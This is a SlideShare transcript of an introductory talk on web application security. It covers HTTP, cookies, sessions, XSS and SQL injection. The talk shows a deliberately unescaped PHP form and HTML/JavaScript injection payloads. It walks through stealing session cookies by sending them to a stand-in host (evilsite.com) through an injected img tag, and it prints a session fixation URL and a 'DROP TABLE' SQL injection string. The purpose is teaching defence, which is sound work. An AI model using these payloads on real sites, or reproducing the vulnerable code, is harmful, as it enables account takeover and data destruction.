Webapp security testing
Upcoming SlideShare
Loading in...5
×
 

Webapp security testing

on

  • 851 views

 

Statistics

Views

Total Views
851
Views on SlideShare
851
Embed Views
0

Actions

Likes
2
Downloads
12
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Apple Keynote

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Add a mandatory ‘Host’ header\nWe have run out of IP addresses - this means you can have multiple sites per IP\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n

Webapp security testing Webapp security testing Presentation Transcript

  • Fundamentals of webapplication security & security testing t0m <bobtfish@bobtfish.net>
  • Who are you?• Open source hacker• github.com/bobtfish/• Perl guy (sorry) - 160 CPAN modules• Core team for Catalyst and Plack web frameworks.• Ex professional security tester / R&D
  • This talk
  • This talk• ~ 1h long
  • This talk• ~ 1h long• Covers the very basics • HTTP • Host headers • Cookies
  • This talk• ~ 1h long• Covers the very basics • HTTP • Host headers • Cookies• Tools • Paros / Charles / etc
  • • Sessions • Session fixation attacks
  • • Sessions • Session fixation attacks• XSS (General HTML injection) • How to test • How to exploit
  • • Sessions • Session fixation attacks• XSS (General HTML injection) • How to test • How to exploit• SQL Injection
  • • NOT comprehensive.
  • • NOT comprehensive.• JUST the basics.
  • You don’t need to be a programmer
  • You don’t need to be a programmer• I’m going to assume you know a bit about the internet
  • You don’t need to be a programmer• I’m going to assume you know a bit about the internet• And that you’ve at least seen HTML before.
  • Workshop on Sunday
  • Workshop on Sunday• No schedule - made by you!
  • Workshop on Sunday• No schedule - made by you!
  • Workshop on Sunday• No schedule - made by you!• Deeper and more practical discussion
  • HTML
  • HTML• The markup format that web pages are written in.
  • HTML• The markup format that web pages are written in.• I’m just assuming you all know the basics
  • HTML• The markup format that web pages are written in.• I’m just assuming you all know the basics• Sorry if you don’t ;P
  • HTML• The markup format that web pages are written in.• I’m just assuming you all know the basics• Sorry if you don’t ;P• Can almost always be sloppy - browser tries to do the right thing.
  • HTTP - The very basics
  • HTTP - The very basics• HTTP goes over TCP/IP
  • HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered
  • HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port
  • HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response
  • HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response • URL
  • HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response • URL • Method
  • Request / Response
  • Request / Response• You ask the sever for some data
  • Request / Response• You ask the sever for some data• It does some work
  • Request / Response• You ask the sever for some data• It does some work• And serves you a response, possibly including data, called a ‘body’
  • Dynamic
  • Dynamic• The response could just be a file on disc
  • Dynamic• The response could just be a file on disc• HTML, image, etc
  • Dynamic• The response could just be a file on disc• HTML, image, etc• We’re interested about when it’s dynamic - i.e. when your input changes the HTML output.
  • GET / HTTP/1.0HTTP/1.1 200 OKDate: Wed, 29 Aug 2012 21:47:59 GMTServer: ApacheLast-Modified: Wed, 27 Jul 2011 10:18:21 GMTETag: "1c888b-0-4a90a5e239540"Accept-Ranges: bytesContent-Length: 0Vary: Accept-EncodingConnection: closeContent-Type: text/htmlX-Pad: avoid browser bug
  • GET / HTTP/1.0
  • GET / HTTP/1.0• Simplest possible HTTP request
  • GET / HTTP/1.0• Simplest possible HTTP request• Method - GET
  • GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /
  • GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /• HTTP version
  • GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /• HTTP version• Followed by rnrn
  • GET / HTTP/1.0• Headers optional after first line
  • GET / HTTP/1.0• Headers optional after first line• Body can be supplied after rnrn if you specify a non-zero content length
  • GET / HTTP/1.0• Headers optional after first line• Body can be supplied after rnrn if you specify a non-zero content length• There will be examples of this later
  • HTTP/1.1 200 OK
  • HTTP/1.1 200 OK• Always the first line of the response
  • HTTP/1.1 200 OK• Always the first line of the response• We asked for 1.0, got 1.1 back
  • HTTP/1.1 200 OK• Always the first line of the response• We asked for 1.0, got 1.1 back• 200 is response code. • 2xx - Success • 3xx - Redirect • 4xx - User error • 5xx - Server error
  • Date: Wed, 29 Aug 2012 21:47:59 GMT• Other headers now follow. All in format: Key:Value• Date: RFC822• Optional
  • Server: Apache• Sometimes has exact versions and extensions• Easy to lie• Optional
  • Last-Modified: Wed, 27Jul 2011 10:18:21 GMT• Used for caching (maybe)• Optional
  • ETag:"1c888b-0-4a90a5e239540"• Used for caching (maybe)• Optional
  • Accept-Ranges: bytes• ‘Partial GET’• Ask for a byte range in the file• Get back just that part• Used by ‘download managers’ to resume• Optional
  • Content-Length: 0• Mandatory!• Specifies how long the body is• Can be 0
  • Vary: Accept-Encoding• For caching • What header fields mean a different version of the document • E.g. language detection• Optional
  • Connection: close• Server is going to drop the connection, you have to reconnect.• Possible to keep the connection persistent, if you ask for it
  • Content-Type: text/html• How the browser should interpret the body• Mandatory for documents with a body
  • HTTP 1.1• Adds a mandatory Host header to the request• Allows > 1 web site per IP address
  • GET / HTTP/1.1Host: goatse.co.ukHTTP/1.1 200 OKDate: Wed, 29 Aug 2012 21:49:49 GMTServer: ApacheLast-Modified: Wed, 27 Jul 2011 10:18:21 GMTETag: "1c888b-0-4a90a5e239540"Accept-Ranges: bytesContent-Length: 0Vary: Accept-EncodingConnection: closeContent-Type: text/htmlX-Pad: avoid browser bug
  • Sending data to the server
  • Sending data to the server• Encode it into the URI
  • Sending data to the server• Encode it into the URI • /with/a/path
  • Sending data to the server• Encode it into the URI • /with/a/path • /?or=parameters
  • POST
  • POST• Used to send data back to the server
  • POST• Used to send data back to the server• Content-Type: application/x-www-form- urlencoded
  • POST• Used to send data back to the server• Content-Type: application/x-www-form- urlencoded• Has a Content-Length, and a body
  • POST• Used to send data back to the server• Content-Type: application/x-www-form- urlencoded• Has a Content-Length, and a body• Data is encoded like this: foo=bar&foo2=baz
  • POSTPOST / HTTP/1.1Host: www.example.comContent-Length: 17Content-Type: application/x-www-form-urlencodedfoo=bar&foo2=quux
  • Forms• HTML forms are the primary means of getting user data to the server• Data is in the body, not the URL, so they don’t get saved in bookmarks• <form> tag• <input> tag
  • Ok - basics covered!
  • Ok - basics covered!• Phew!
  • Ok - basics covered!• Phew!• Lets put all this stuff together - into an application.
  • Ok - basics covered!• Phew!• Lets put all this stuff together - into an application.• And then hack it.
  • Simplest possible app<html>Data is: <form><input name=”foo” value=”<?php echo$_GET[foo] ?>” /><input type=”submit” /></form></html>
  • http://server/test.php? foo=foo
  • FAIL
  • FAIL• Did you spot the epic fail?
  • FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”
  • FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”• Golden rule - never ever accept input without validating it’s sane
  • FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”• Golden rule - never ever accept input without validating it’s sane• Golden rule - never ever output anything that may have come from external input without encoding it
  • WHY?
  • WHY?• You can send: ?foo="><blink>Foo< %2Fblink>
  • WHY?• You can send: ?foo="><blink>Foo< %2Fblink>• Comes out as: <input name="foo" value=""><blink>Foo</blink>
  • WHY?• You can send: ?foo="><blink>Foo< %2Fblink>• Comes out as: <input name="foo" value=""><blink>Foo</blink>• You just added HTML to the document - fail!
  • Javascript
  • Javascript• Is where it all goes really wrong
  • Javascript• Is where it all goes really wrong• Can change or rewrite the page
  • Javascript• Is where it all goes really wrong• Can change or rewrite the page• Can be inserted inline into HTML
  • Javascript• Is where it all goes really wrong• Can change or rewrite the page• Can be inserted inline into HTML• foo="><script>document.removeChild(doc ument.getElementsByTagName(html)[0])< %2Fscript>
  • Bye bye page!
  • Less simple example
  • Less simple example• Add data storage
  • Less simple example• Add data storage• E.g. Message board multiple people can look at
  • Less simple example• Add data storage• E.g. Message board multiple people can look at• Doom!
  • Less simple example• Add data storage• E.g. Message board multiple people can look at• Doom!• Or at least vandalism
  • More theory
  • More theory• Sorry, but it’s necessary
  • More theory• Sorry, but it’s necessary• People’s credit card numbers are behind login pages
  • More theory• Sorry, but it’s necessary• People’s credit card numbers are behind login pages• So we have to understand how logins work to steal them
  • Cookies
  • Cookies
  • CookiesNot like that!
  • Cookies
  • Cookies Or that!
  • Cookies
  • CookiesDefinitely not!
  • Set-Cookie
  • Set-Cookie• A request header
  • Set-Cookie• A request header• Set-Cookie: foo=bar
  • Set-Cookie• A request header• Set-Cookie: foo=bar• Set-Cookie: foo=bar; expires=Thu, 01- Jan-1970 00:01:40 GMT; path=/; domain=example.net
  • Affects subsequent requestsBrowser returns “Cookie: foo=bar” header
  • Sessions
  • Sessions• Hand each visitor a random session token, identify them in future
  • Sessions• Hand each visitor a random session token, identify them in future• Login credentials only transmitted once
  • Sessions• Hand each visitor a random session token, identify them in future• Login credentials only transmitted once• Allows login to be SSL (and rest of site not)
  • Sessions
  • Sessions• Shared secret
  • Sessions• Shared secret• If it stops being a secret, you lose!
  • Stealing cookies
  • Stealing cookies• Can get cookie data from javascript
  • Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability, we can run code that grabs the cookie
  • Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability, we can run code that grabs the cookie• “Same origin policy” - cannot transmit elsewhere.
  • Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability, we can run code that grabs the cookie• “Same origin policy” - cannot transmit elsewhere.• Cheat! Add content to the document.
  • <img src=”http://evilsite.com/?data=here” />
  • Lets step through that
  • Lets step through that• Message board site gives users a cookie when they login
  • Lets step through that• Message board site gives users a cookie when they login• Cookie contains session token
  • Lets step through that• Message board site gives users a cookie when they login• Cookie contains session token• You post an evil message containing Javascript
  • Lets step through that• Message board site gives users a cookie when they login• Cookie contains session token• You post an evil message containing Javascript• Other users view your message
  • Lets step through that
  • Lets step through that• Other user’s browsers execute your javascript
  • Lets step through that• Other user’s browsers execute your javascript• It grabs their cookie
  • Lets step through that• Other user’s browsers execute your javascript• It grabs their cookie• Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” />
  • Lets step through that• Other user’s browsers execute your javascript• It grabs their cookie• Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” />• Users browser tries to download image
  • Lets step through that
  • Lets step through that• evilsite.com records the cookie
  • Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent gif
  • Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent gif• I can now post messages as any (still logged in) user who viewed my message.
  • Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent gif• I can now post messages as any (still logged in) user who viewed my message.• Having the users’s cookie allows you to become the user
  • Did you notice the handwave?
  • Did you notice the handwave?• I need a way to get your cookie into my browser
  • Did you notice the handwave?• I need a way to get your cookie into my browser• This is easy to do - find a proxy library in your favourite programming language ;P
  • Did you notice the handwave?• I need a way to get your cookie into my browser• This is easy to do - find a proxy library in your favourite programming language ;P• Or tools you can just download
  • Session fixation
  • Session fixation• Quite a common bug
  • Session fixation• Quite a common bug• Allows you to specify the session ID you’d like
  • Session fixation• Quite a common bug• Allows you to specify the session ID you’d like• Useful for abusing XSS elsewhere
  • Session fixation• Quite a common bug• Allows you to specify the session ID you’d like• Useful for abusing XSS elsewhere• Also good to steal logins without needing XSS.
  • Session fixation• Quite a common bug• Allows you to specify the session ID you’d like• Useful for abusing XSS elsewhere• Also good to steal logins without needing XSS.• /?sessionID=XXXXXXXXXXX
  • Tools
  • Tools - Paros• http://www.parosproxy.org/
  • Tools - Charles• OSX only• Costs money (free trial)
  • Tools - Firebug
  • Tools - Firebug• Firefox addon
  • Tools - Firebug• Firefox addon• Allows you to debug javascript and HTML
  • Tools - Firebug• Firefox addon• Allows you to debug javascript and HTML• Useful for getting exploits working in combination with another tool
  • SQL Injection
  • SQL Injection• SQL used by databases, for data storage
  • SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows
  • SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows• SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;
  • SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows• SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;• SAME ISSUE AS BEFORE
  • SQL Injection
  • SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
  • First query.No password needed!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
  • Second query. Ruins your day!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
  • Comment - ignored!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
  • Golden Rules
  • Golden Rules• Never ever accept input without validating it’s sane.
  • Golden Rules• Never ever accept input without validating it’s sane.• Never ever output anything that may have come from external input without encoding it.
  • Thanks for listening!• Hope that wasn’t too boring :)• Feel free to come chat to me.• Or mail me: bobtfish@bobtfish.net• Or grab me on irc: t0m on Freenode• More in-depth workshop on Sunday!